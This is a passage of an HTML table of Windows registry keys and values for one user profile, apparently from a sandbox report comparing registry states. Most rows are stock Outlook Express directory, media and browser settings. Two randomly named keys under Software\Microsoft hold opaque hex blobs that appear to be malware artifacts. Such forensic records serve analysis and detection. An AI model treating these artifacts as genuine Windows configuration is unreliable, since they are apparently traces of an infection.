<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Base</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Bigfoot Internet Directory Service"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"ldap.bigfoot.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP URL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://www.bigfoot.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Logo</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,62,69,67,66,6f,6f,74,2e,62,6d,70,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VeriSign Internet Directory Service"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"directory.verisign.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP URL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://www.verisign.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Base</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Logo</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,76,65,72,69,73,69,67,6e,2e,62,6d,70,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"WhoWhere Internet Directory Service"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"ldap.whowhere.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP URL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://www.whowhere.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Logo</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,77,68,6f,77,68,65,72,65,2e,62,6d,70,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Rowi</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Rowi</span></td>
<td><span style="color: black; font-size: xx-small;">Xoywarsu</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,da,81,20,17,73,ab,ee,51,52,94,51,12,67,6e,e8,7a,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,8a,c7,26,4a,74,cb,75,91,2d,a4,34,86,54,16,8b,30,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Siabvu</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Siabvu</span></td>
<td><span style="color: black; font-size: xx-small;">Vumyyfdol</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,75,13,7f,ce,dc,8a,b9,4f,2f,3e,98,05,e5,54,e7,1e,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4</span></td>
<td><span style="color: black; font-size: xx-small;">OlkContactRefresh</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4</span></td>
<td><span style="color: black; font-size: xx-small;">OlkFolderRefresh</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4</span></td>
<td><span style="color: black; font-size: xx-small;">FirstRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4\Wab File Name</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4\Wab File Name</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">FriendlyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Default MidiOut Device"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">CLSID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{07B65360-C445-11CE-AFDE-00AA006C14F4}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">FilterData</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,38,00,00,00,48,00,00,00,6d,69,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">MidiOutId</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:ffffffff</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">FriendlyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Default DirectSound Device"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">CLSID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{79376820-07D0-11CF-A24D-0020AFD79767}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">FilterData</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,08,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,a8,00,00,00,b8,00,00,00,31,74,79,33,00,00,00,00,a8,00,00,00,c8,00,00,00,32,74,79,33,00,00,00,00,a8,00,00,00,d8,00,00,00,33,74,79,33,00,00,00,00,a8,00,00,00,e8,00,00,00,34,74,79,33,00,00,00,00,a8,00,00,00,f8,00,00,00,35,74,79,33,00,00,00,00,a8,00,00,00,08,01,00,00,36,74,79,33,00,00,00,00,a8,00,00,00,18,01,00,00,37,74,79,33,00,00,00,00,a8,00,00,00,28,01,00,00,61,75,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,01,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,09,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,03,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,92,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,40,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,41,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,64,01,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,49,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">DSGuid</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{00000000-0000-0000-0000-000000000000}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Privacy</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Privacy</span></td>
<td><span style="color: black; font-size: xx-small;">CleanCookies</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing</span></td>
<td><span style="color: black; font-size: xx-small;">NewTabPageShowClosedTabs</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing</span></td>
<td><span style="color: black; font-size: xx-small;">NewTabPageShowActivities</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\CommandBar</span></td>
<td><span style="color: black; font-size: xx-small;">CompatibilityViewButtonBalloonCount</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Recovery\Active</span></td>
<td><span style="color: black; font-size: xx-small;">{8CFA7582-04D2-11E2-A16C-08002765500A}</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Recovery\Active</span></td>
<td><span style="color: black; font-size: xx-small;">{E4F1361D-04D0-11E2-A16B-08002765500A}</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}</span></td>
<td><span style="color: black; font-size: xx-small;">AttemptedAutoRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{976ABECA-93F7-4d81-9187-2A6137829675}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{99DB05E3-F81E-4C8A-A252-F396306AB6FE}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9F9562EB-15B6-46C6-A7CB-0A66FC65130E}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9FA014E3-076F-4865-A73C-117131B8E292}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{D5E49195-ED19-40fb-9EE0-E6625A808B77}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{E641D09E-E500-4c09-8260-F1CD7B902E9C}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{F24A1BC2-2331-4B91-8A13-5A549DA56E9D}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{FD981763-B6BB-4d51-9143-6D372A0ED56F}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\MediaLibrarySettings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz</span></td>
<td></td>
<td></td>
<td></td>
</tr>
